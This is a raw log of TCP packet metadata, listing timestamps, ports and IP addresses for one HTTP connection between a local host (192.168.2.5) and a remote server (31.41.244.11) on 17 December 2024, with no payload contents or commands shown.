Dec 17, 2024 06:03:39.820573092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.821496010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.821543932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.821621895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.821681023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.822518110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.822577000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.822639942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.822688103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.823606968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.823667049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.823731899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.823776007 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.824419975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.824492931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.824527979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.824573040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.825521946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.825577021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.825632095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.825671911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.826539040 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.826587915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.826709986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.826756954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.827689886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.827743053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.827791929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.827838898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.828710079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.828771114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.828804970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.828851938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.829746962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.829855919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.829979897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.830028057 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.830794096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.830847979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.830987930 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.831037045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.831939936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.831991911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.832052946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.832099915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.832952023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.833000898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.833054066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.833100080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.834058046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.834093094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.834105015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.834134102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.835127115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.835172892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.835299969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.835357904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.836139917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.836174965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.836194038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.836214066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.837167025 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.837219000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.837297916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.837563992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.838316917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.838355064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.838378906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.838388920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.839374065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.839407921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.839441061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.839452028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.840406895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.840449095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.840460062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.840500116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.841489077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.841522932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.841545105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.841576099 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.842436075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.842484951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.842607975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.842673063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.843605995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.843641043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.843662024 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.843683958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.844672918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.844707966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.844770908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.845690012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.845747948 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.845774889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.845822096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.846730947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.846785069 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.846788883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.846841097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.847861052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.847913027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.847924948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.847971916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.848815918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.848860025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.848936081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.848983049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.849909067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.849968910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.849997997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.850049019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.850919008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.850980043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.851042032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.851089001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.852014065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.852060080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.852123022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.852170944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.853063107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.853118896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.853168964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.853223085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.854140043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.854204893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.854266882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.854316950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.855223894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.855284929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.855336905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.855390072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.856219053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.856267929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.856331110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.856384993 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.857310057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.857361078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.857475996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.857522011 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.858386993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.858443022 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.858505011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.858555079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.859422922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.859476089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.859599113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.859647036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.860467911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.860524893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.860569000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.860620022 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.861505032 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.861563921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.861624956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.861673117 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.862673044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.862728119 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.006913900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.006970882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.007046938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.007085085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.007528067 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.007589102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.007667065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.007719040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.008680105 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.008714914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.008732080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.008763075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.008812904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.008848906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.008858919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.008896112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.009615898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.009670019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.009725094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.009774923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.011111021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.011163950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.011240959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.011295080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.011955976 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.012006044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.012406111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.012459040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.012804031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.012861967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.012897968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.012948990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.013866901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.013916969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.013931990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.013976097 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.014955044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.014988899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.015007973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.015032053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.016182899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.016217947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.016244888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.016278028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.020191908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.020242929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.020276070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.020312071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.020704031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.020752907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.020828009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.020876884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.021692038 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.021747112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.021836996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.021884918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.022735119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.022797108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.022943974 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.022999048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.023833036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.023866892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.023894072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.023911953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.025042057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.025079966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.025093079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.025120020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.025897980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.025949955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.026046991 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.026096106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.026915073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.026964903 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.027070045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.027116060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.028054953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.028090000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.028107882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.028132915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.029160023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.029211998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.029459000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.029505968 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.030194044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.030227900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.030242920 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.030265093 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.031166077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.031219959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.031294107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.031335115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.032370090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.032403946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.032427073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.032444000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.033472061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.033504963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.033526897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.033551931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.034445047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.034499884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.034563065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.034606934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.035403013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.035458088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.035541058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.035587072 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.036633968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.036668062 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.036686897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.036711931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.037594080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.037648916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.037781954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.037822962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.038801908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.038860083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.038913012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.038959980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.039748907 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.039782047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.039803982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.039828062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.040810108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.040844917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.040867090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.040887117 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.041969061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.042006016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.042028904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.042047977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.042907000 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.042967081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.043046951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.043095112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.044214964 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.044250011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.044272900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.044292927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.044996023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.045047998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.045110941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.045161009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046036005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046088934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046173096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046247005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046382904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046416998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046428919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046454906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046516895 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046550989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.046561956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.046597958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.049443007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.049478054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.049509048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.049532890 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.050364971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.050398111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.050422907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.050440073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.051512957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.051549911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.051568985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.051585913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.052467108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.052522898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.052609921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.052653074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.053406954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.053461075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.053571939 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.053616047 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.054649115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.054685116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.054702044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.054722071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.055681944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.055737019 CET	49902	80	192.168.2.5	31.41.244.11
